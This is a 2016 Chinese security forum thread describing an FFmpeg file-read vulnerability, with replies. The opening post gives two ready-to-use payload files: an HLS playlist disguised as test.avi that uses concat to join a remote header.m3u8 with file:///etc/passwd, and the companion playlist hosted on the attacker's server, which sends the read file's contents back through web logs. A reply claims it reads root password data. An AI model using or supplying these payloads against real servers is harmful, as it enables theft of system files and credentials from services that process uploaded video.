查看: 14350|回复: 2

FFmpeg文件读取漏洞测试及利用

[复制链接]
  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

    发表于 2016-6-20 21:56:05 | 显示全部楼层 |阅读模式
    本帖最后由 人=族 于 2016-6-20 21:57 编辑

    看了老外写的文章,大概理解的利用方式如下:

    #EXTM3U
    #EXT-X-MEDIA-SEQUENCE:0
    #EXTINF:10.0,
    concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd
    #EXT-X-ENDLIST
    以上内容保存成test.avi,是用来上传到被攻击服务器的。

    #EXTM3U
    #EXT-X-MEDIA-SEQUENCE:0
    #EXTINF:,
    http://www.nxadmin.com?
    以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:









    会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。

    header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。

    经历过ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞
                      
    回复

    使用道具 举报

  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2016-6-21 13:16:39 | 显示全部楼层
    普通权限也阔以?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

     楼主| 发表于 2016-6-22 09:57:24 | 显示全部楼层
    本地测试的可以读取 、root密码
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 13:53 , Processed in 0.025446 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部